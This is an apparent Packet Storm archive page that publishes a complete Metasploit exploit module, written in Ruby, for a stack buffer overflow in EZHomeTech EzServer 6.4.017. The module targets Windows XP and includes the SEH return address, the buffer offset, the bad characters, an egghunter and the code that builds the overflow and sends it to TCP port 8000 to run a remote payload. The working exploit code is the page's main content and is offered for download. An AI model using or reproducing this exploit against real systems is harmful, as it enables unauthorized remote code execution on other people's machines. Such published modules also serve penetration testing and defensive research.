exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EZHomeTech EzServer 6.4.017 Stack Buffer Overflow

EZHomeTech EzServer 6.4.017 Stack Buffer Overflow
Posted Jun 19, 2012
Authored by modpr0be | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious user sends packets containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.

tags | exploit, overflow
SHA-256 | 2bc92ff43f6bcca9c19f782162fc5db7f333fc90bad8a57b6c286fccae52a802

EZHomeTech EzServer 6.4.017 Stack Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
user sends packets containing an overly long string, it may be possible to execute a
payload remotely. Due to size constraints, this module uses the Egghunter technique.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
],
'References' =>
[
[ 'EDB', '19266' ],
[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'seh'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
'DisableNops' => true
},
'Targets' =>
[
[ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
{
'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
'Offset' => 5852
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 18 2012',
'DefaultTarget' => 0))

register_options([Opt::RPORT(8000)], self.class)

end

def exploit
connect
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}

hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
egg = hunter[1]
buff = rand_text(target['Offset'] - egg.length) #junk
buff << egg
buff << make_nops(32)
buff << generate_seh_record(target.ret)
buff << make_nops(16)
buff << hunter[0]
buff << rand_text_alpha_upper(500)

print_status("Triggering shellcode now...")
print_status("Please be patient, the egghunter may take a while..")

sock.put(buff)

handler
disconnect

end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close